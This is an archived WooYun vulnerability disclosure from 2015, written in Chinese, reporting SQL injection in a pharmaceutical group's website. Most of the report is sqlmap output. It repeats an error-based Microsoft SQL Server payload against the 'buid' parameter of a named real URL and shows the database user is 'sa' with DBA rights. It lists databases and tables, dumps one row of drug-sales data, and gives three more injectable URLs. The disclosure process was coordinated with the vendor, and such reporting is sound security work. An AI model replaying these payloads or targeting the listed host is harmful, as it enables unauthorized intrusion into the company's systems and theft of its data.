乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-18: 细节已通知厂商并且等待厂商处理中 2015-08-19: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-18: 细节向实习白帽子公开 2015-10-03: 细节向公众公开
公司存在多处SQL注入漏洞,严重影响数据安全性。
注入点:
http://www.crsdyy.com/sdgs/index.asp?buid=3701000110
---Parameter: buid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005current user: 'sa'current user is DBA: True
---Parameter: buid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005available databases [9]:[*] master[*] model[*] msdb[*] sdgs[*] shxt[*] sjcj[*] sjzl[*] syxh[*] tempdb
---Parameter: buid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005Database: sdgs[25 tables]+----------------+| biuser_bak || bulist || download || download_type || fwl || gysuser || ip || link || lxjl || medicine_type || news || news_type || product || pt_user || qyfc || qyxchz || qyxcmx || sqlmapoutput || sysuser || v_search || zhaoshang || zhaoshang_oid || zhaoshang_type || zlzx || zlzx_type |+----------------+
---Parameter: buid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005Database: master[301 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || MSreplication_options || dj_ls || djbh || djhz || djmx || kh_doc || sp_doc || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || userlist || v_dj_ls || v_rkmx || sys.all_columns || sys.all_objects || sys.all_parameters || sys.all_sql_modules || sys.all_views |+---------------------------------------------------+
---Parameter: buid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005Database: sjcj[81 tables]+----------+| aslk1 || becc1 || beyy1 || bjhh01 || bjhs01 || bjhs1 || bjnh1 || bjnhobu1 || bjsh1 || blg01 || blkxy01 |+-----------
---Parameter: buid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005Database: sjcjTable: aslk1[1 entry]+--------+------------+---------------------+---------+----------+---------+| makeno | rq | warename | wareqty | wareunit | 公司名称 |+--------+------------+---------------------+---------+----------+---------+| XCWZ | 2015-08-17 | 注射用奥美拉唑钠(静脉滴注)(洛赛克) | 96.0000 | 支 | <blank> |+--------+------------+---------------------+---------+----------+---------+
重要信息还很多,数据就不一一跑了~其他注入点一起送上:
http://www.crsdyy.com/sdgs/index.asp?buid=3701000106http://www.crsdyy.com/sdgs/index.asp?buid=3701000107http://www.crsdyy.com/sdgs/index.asp?buid=3701000108
危害等级:高
漏洞Rank:20
确认时间:2015-08-19 15:20
sa权限,又是分分钟打进内网的节奏,哎!!已通知药业集团
暂无